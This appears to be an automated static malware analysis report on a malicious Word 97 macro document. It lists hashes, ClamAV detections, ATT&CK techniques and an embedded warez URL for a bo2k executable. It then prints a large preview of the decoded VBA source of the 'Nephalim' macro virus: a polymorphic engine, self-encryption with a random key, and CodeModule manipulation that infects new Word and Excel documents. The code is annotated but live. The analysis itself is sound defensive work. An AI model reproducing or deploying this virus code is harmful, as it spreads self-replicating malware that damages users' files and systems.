Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35b27486ead54b0f…

MALICIOUS

Office (OLE)

58.0 KB Created: 1999-11-12 18:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: cfe541a52bda36039361cfc8b29d1146 SHA-1: aa8795a3f57ad1a252c2f0bd31459e2fb1b614a4 SHA-256: 35b27486ead54b0f0a508897fd4ce4dd0195c9b54458afda2d5284d23c85249a
Risk Score: 362

Malware Insights

MITRE ATT&CK
T1059.005 — Visual Basic; T1204.002 — Malicious File

The sample contains VBA macros, including the Document_Open and Workbook_Open auto-execute handlers, which run without further user interaction once macros are enabled. Critical heuristics flag Shell() and CreateObject() calls, indicating that the macro can execute arbitrary code. The embedded URL 'http://www.bo2k.com/warez/bo2k_1.0.exe' was found in the document body text rather than in the macro code and may point to a secondary payload. ClamAV detections of both the file and its extracted macro artifact further confirm that the sample is malicious.

Heuristics 8

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.nephilim.com/ — In document text (OLE body)
    • http://www.bo2k.com/warez/bo2k_1.0.exe — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 72056 bytes
SHA-256: c24d9609751039f5a8652adda3b229fb0e60f9b26e5e1cf1291fa4dd6ba79520
Detection
ClamAV: Win.Trojan.W-420
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Nephalim v0.93  --  Pre-release version.
'
' Known issues in this release:
'   -Instability on Excel platform
'
' Deletes the file at sFileName if it exists. Every runtime error is
' suppressed by On Error Resume Next, so a failed delete is silent.
Private Sub fDeleteFile(sFileName As String)
On Error Resume Next
' Dir() returns "" when no file matches the path
If Dir(sFileName) <> "" Then
' SetAttr ... 0 (vbNormal) resets the attribute bits before Kill -
' presumably so a read-only or hidden flag cannot block the delete
SetAttr sFileName, 0
Kill sFileName
End If
End Sub
' Returns a random string for use as a key.
' Length: Int((30 * Rnd) + 6) gives 6..35 characters.
' Each character: Chr(Int((122 - 65) * Rnd) + 65) gives code points 65..121,
' i.e. 'A'..'y' including the punctuation between 'Z' and 'a'.
' Rnd is not re-seeded here; the sequence depends on any earlier Randomize call.
' No return type is declared, so the result is a Variant holding a String.
Private Function CreateKey()
On Error Resume Next
Dim iTemp As Integer, sKey As String
sKey = ""
' one character appended per iteration; loop bound is fixed when the loop starts
For iTemp = 1 To Int((30 * Rnd) + 6): sKey = sKey + Chr(Int((122 - 65) * Rnd) + 65): Next iTemp
CreateKey = sKey
End Function
Private Function fExposedEngine(sTargetApp As String, sKey As String, iLineCount As Integer)
On Error Resume Next
Dim var(20) As String, eol(20) As String, bond(20) As String, proc_declare(20) As String
Dim sEngine1 As String, sEngine2 As String, sEngine3 As String
Randomize
sTemp = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
For iTemp = 1 To 20
poz = Int(Rnd * Len(sTemp)) + 1
var(iTemp) = Mid(sTemp, poz, 1)
sTemp = Left(sTemp, poz - 1) + Right(sTemp, Len(sTemp) - poz)
Select Case Int((4 * Rnd) + 1)
Case 1: bond(iTemp) = ": "
eol(iTemp) = vbLf & vbLf & vbLf
proc_declare(iTemp) = ""
Case 2: bond(iTemp) = vbLf
eol(iTemp) = vbLf
proc_declare(iTemp) = "Private "
Case 3: bond(iTemp) = vbLf & vbLf
eol(iTemp) = vbLf & vbLf
proc_declare(iTemp) = "Public "
Case 4: bond(iTemp) = ": Rem " & CreateKey & vbLf
eol(iTemp) = vbLf & vbLf & vbLf
proc_declare(iTemp) = ""
End Select
Next iTemp
iSplitNumber1 = 130
iSplitNumber1A = Int(Rnd * iSplitNumber1)
iSplitNumber1B = iSplitNumber1 - iSplitNumber1A
iSplitNumber2 = 32
iSplitNumber2A = Int(Rnd * iSplitNumber2)
iSplitNumber2B = iSplitNumber2 - iSplitNumber2A
iSplitNumber3 = iLineCount
iSplitNumber3A = Int(Rnd * iSplitNumber3)
iSplitNumber3B = iSplitNumber3 - iSplitNumber3A
sObject = var(9) & ".VBProject.VBComponents.Item(" & var(16) & ").CodeModule."
iTemp = Int(Rnd * Len(sObject)) + 1
poz = InStr(iTemp, sObject, ".")
sOne = Left(sObject, poz - 1)
sTwo = Right(sObject, Len(sObject) - poz + 1)
sSplitObject1A = "set " & var(10) & " = " & sOne
sSplitObject1B = var(10) & sTwo
sObject = "VBProject.VBComponents.Item(1).CodeModule."
iTemp = Int(Rnd * Len(sObject)) + 1
poz = InStr(iTemp, sObject, ".")
sOne = Left(sObject, poz - 1)
sTwo = Right(sObject, Len(sObject) - poz + 1)
sSplitObject2A = "set " & var(13) & " = " & sOne
sSplitObject2B = var(13) & sTwo
sEngine1 = _
"Private Sub " & var(14) & "()" & bond(1) & _
"On Error Resume Next" & bond(2)
Select Case sTargetApp
Case "Excel":  sEngine1 = sEngine1 & _
"Dim " & var(9) & " As Excel.Workbook" & bond(3) & _
"Set " & var(9) & " = Excel.Workbooks.Add" & bond(4) & _
var(16) & " = 4" & bond(5)
Case "Word":  sEngine1 = sEngine1 & _
"Dim " & var(9) & " As Word.Document" & bond(3) & _
"Set " & var(9) & " = Word.Documents.Add" & bond(4) & _
var(16) & " = 1" & bond(5)
End Select
sEngine1 = sEngine1 & _
sSplitObject1A & bond(6) & _
sSplitObject2A & bond(7) & _
var(11) & " = (" & iSplitNumber1A & "+" & iSplitNumber1B & ")" & bond(8) & _
var(12) & " = (" & iSplitNumber2A & "+" & iSplitNumber2B & ")" & bond(9) & _
"For " & var(1) & " = 1 To " & iSplitNumber3A & "+" & iSplitNumber3B & eol(10) & _
var(5) & " = " & sSplitObject2B & "lines(" & var(1) & ", 1)" & bond(11) & _
var(5) & " = right(" & var(5) & ",len(" & var(5) & ")-1)" & bond(12) & _
var(4) & " = """"" & bond(13) & _
var(3) & " = 0" & bond(14) & _
"For " & var(2) & " = 1 To Len(" & var(5) & ")" & eol(15) & _
var(3) & " = " & var(3) & " + 1" & eol(16) & _
"If " & var(3) & " > " & Len(sKey) & "Then " & var(3) & " = 1" & eol(1) & _
var(6) & " = Asc(Mid(" & var(5) & ", " & var(2) & ", 1))" & eol(17) & _
"If " & var(6) & " >= " & var(12) & " And " & var(6) & " <= " & var(11) & " Then" & eol(18)
sEngine2 = _
var(8) & " = Asc(Mid(""" & sKey & """, " & var(3) & ", 1))" & bond(19)
sEngine3 = _
"If " & var(8) & " >
... (truncated)